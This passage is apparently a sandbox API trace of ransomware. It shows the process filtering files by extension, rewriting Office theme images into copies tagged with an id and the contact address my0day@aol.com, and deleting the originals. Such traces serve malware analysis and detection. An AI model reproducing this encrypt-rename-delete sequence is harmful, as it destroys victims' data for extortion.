[0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.251] lstrlenW (lpString=".dbf") returned 4 [0045.251] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.251] lstrlenW (lpString=".1cd") returned 4 [0045.251] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.252] lstrlenW (lpString=".jpg") returned 4 [0045.252] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.252] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.252] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.252] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=32433) returned 1 [0045.252] CloseHandle (hObject=0x198) returned 1 [0045.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 0x20 [0045.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.252] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.253] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.253] GetLastError () returned 0x0 [0045.253] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x7eb1, lpOverlapped=0x0) returned 1 [0045.976] WriteFile (in: hFile=0x178, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7ec0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7ec0, lpOverlapped=0x0) returned 1 [0045.977] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.978] WriteFile (in: hFile=0x178, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.978] SetEndOfFile (hFile=0x178) returned 1 [0045.978] CloseHandle (hObject=0x178) returned 1 [0045.978] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.978] SetEndOfFile (hFile=0x198) returned 1 [0045.979] CloseHandle (hObject=0x198) returned 1 [0045.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.979] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\thmbnail.png")) returned 1 [0045.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.979] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.979] lstrlenW (lpString=".doc") returned 4 [0045.979] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.979] lstrlenW (lpString=".docx") returned 5 [0045.979] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.979] lstrlenW (lpString=".pdf") returned 4 [0045.979] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.979] lstrlenW (lpString=".xls") returned 4 [0045.980] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.980] lstrlenW (lpString=".xlsx") returned 5 [0045.980] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.980] lstrlenW (lpString=".ppt") returned 4 [0045.980] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.980] lstrlenW (lpString=".zip") returned 4 [0045.980] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.980] lstrlenW (lpString=".rar") returned 4 [0045.980] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.980] lstrlenW (lpString=".bz2") returned 4 [0045.980] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.980] lstrlenW (lpString=".7z") returned 3 [0045.980] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.980] lstrlenW (lpString=".dbf") returned 4 [0045.980] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.980] lstrlenW (lpString=".1cd") returned 4 [0045.980] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.980] lstrlenW (lpString=".jpg") returned 4 [0045.980] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.980] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.980] lstrlenW (lpString=".doc") returned 4 [0045.980] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.980] lstrlenW (lpString=".docx") returned 5 [0045.980] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.980] lstrlenW (lpString=".pdf") returned 4 [0045.980] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.980] lstrlenW (lpString=".xls") returned 4 [0045.980] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.981] lstrlenW (lpString=".xlsx") returned 5 [0045.981] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.981] lstrlenW (lpString=".ppt") returned 4 [0045.981] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.981] lstrlenW (lpString=".zip") returned 4 [0045.981] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.981] lstrlenW (lpString=".rar") returned 4 [0045.981] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.981] lstrlenW (lpString=".bz2") returned 4 [0045.981] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.981] lstrlenW (lpString=".7z") returned 3 [0045.981] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.981] lstrlenW (lpString=".dbf") returned 4 [0045.981] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.981] lstrlenW (lpString=".1cd") returned 4 [0045.981] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.981] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\THMBNAIL.PNG") returned 77 [0045.981] lstrlenW (lpString=".jpg") returned 4 [0045.981] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.981] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.981] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.243] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=18413) returned 1 [0046.243] CloseHandle (hObject=0x198) returned 1 [0046.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 0x20 [0046.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.262] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.262] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.263] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.273] GetLastError () returned 0x0 [0046.273] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x47ed, lpOverlapped=0x0) returned 1 [0046.274] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x47f0, lpOverlapped=0x0) returned 1 [0046.275] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.275] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.275] SetEndOfFile (hFile=0x1d8) returned 1 [0046.276] CloseHandle (hObject=0x1d8) returned 1 [0046.276] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.276] SetEndOfFile (hFile=0x198) returned 1 [0046.276] CloseHandle (hObject=0x198) returned 1 [0046.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.277] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.277] lstrlenW (lpString=".doc") returned 4 [0046.277] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.277] lstrlenW (lpString=".docx") returned 5 [0046.277] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.277] lstrlenW (lpString=".pdf") returned 4 [0046.277] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.277] lstrlenW (lpString=".xls") returned 4 [0046.277] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.277] lstrlenW (lpString=".xlsx") returned 5 [0046.277] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.277] lstrlenW (lpString=".ppt") returned 4 [0046.277] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.277] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.277] lstrlenW (lpString=".zip") returned 4 [0046.277] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.277] lstrlenW (lpString=".rar") returned 4 [0046.277] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.277] lstrlenW (lpString=".bz2") returned 4 [0046.278] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.278] lstrlenW (lpString=".7z") returned 3 [0046.278] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.278] lstrlenW (lpString=".dbf") returned 4 [0046.278] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.278] lstrlenW (lpString=".1cd") returned 4 [0046.278] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.278] lstrlenW (lpString=".jpg") returned 4 [0046.278] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.278] lstrlenW (lpString=".doc") returned 4 [0046.278] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.278] lstrlenW (lpString=".docx") returned 5 [0046.278] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.278] lstrlenW (lpString=".pdf") returned 4 [0046.278] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.278] lstrlenW (lpString=".xls") returned 4 [0046.278] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.278] lstrlenW (lpString=".xlsx") returned 5 [0046.278] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.278] lstrlenW (lpString=".ppt") returned 4 [0046.278] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.278] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.278] lstrlenW (lpString=".zip") returned 4 [0046.278] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.278] lstrlenW (lpString=".rar") returned 4 [0046.278] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.278] lstrlenW (lpString=".bz2") returned 4 [0046.278] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.279] lstrlenW (lpString=".7z") returned 3 [0046.279] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.279] lstrlenW (lpString=".dbf") returned 4 [0046.279] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.279] lstrlenW (lpString=".1cd") returned 4 [0046.279] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.279] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.279] lstrlenW (lpString=".jpg") returned 4 [0046.279] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.279] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0046.279] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.279] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1339) returned 1 [0046.279] CloseHandle (hObject=0x198) returned 1 [0046.279] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 0x20 [0046.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0046.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0046.280] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.280] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0046.282] GetLastError () returned 0x0 [0046.282] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x53b, lpOverlapped=0x0) returned 1 [0046.283] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x540, lpOverlapped=0x0) returned 1 [0046.284] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.284] WriteFile (in: hFile=0x1d8, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.284] SetEndOfFile (hFile=0x1d8) returned 1 [0046.284] CloseHandle (hObject=0x1d8) returned 1 [0046.284] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.284] SetEndOfFile (hFile=0x198) returned 1 [0046.285] CloseHandle (hObject=0x198) returned 1 [0046.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0046.285] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\profile\\preview.gif")) returned 1 [0046.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.285] lstrlenW (lpString=".doc") returned 4 [0046.285] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.285] lstrlenW (lpString=".docx") returned 5 [0046.285] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.285] lstrlenW (lpString=".pdf") returned 4 [0046.286] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString=".xls") returned 4 [0046.286] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString=".xlsx") returned 5 [0046.286] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.286] lstrlenW (lpString=".ppt") returned 4 [0046.286] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.286] lstrlenW (lpString=".zip") returned 4 [0046.286] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString=".rar") returned 4 [0046.286] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString=".bz2") returned 4 [0046.286] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.286] lstrlenW (lpString=".7z") returned 3 [0046.286] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.286] lstrlenW (lpString=".dbf") returned 4 [0046.286] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.286] lstrlenW (lpString=".1cd") returned 4 [0046.286] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.286] lstrlenW (lpString=".jpg") returned 4 [0046.286] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.286] lstrlenW (lpString=".doc") returned 4 [0046.286] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.286] lstrlenW (lpString=".docx") returned 5 [0046.286] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.286] lstrlenW (lpString=".pdf") returned 4 [0046.286] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.286] lstrlenW (lpString=".xls") returned 4 [0046.287] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.287] lstrlenW (lpString=".xlsx") returned 5 [0046.287] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.287] lstrlenW (lpString=".ppt") returned 4 [0046.287] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.287] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\PREVIEW.GIF") returned 75 [0046.287] lstrlenW (lpString=".zip") returned 4 [0046.287] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.287] lstrlenW (lpString=".rar") returned 4 [0046.287] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.287] lstrlenW (lpString=".bz2") returned 4 [0046.287] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.287] lstrlenW (lpString=".7z") returned 3 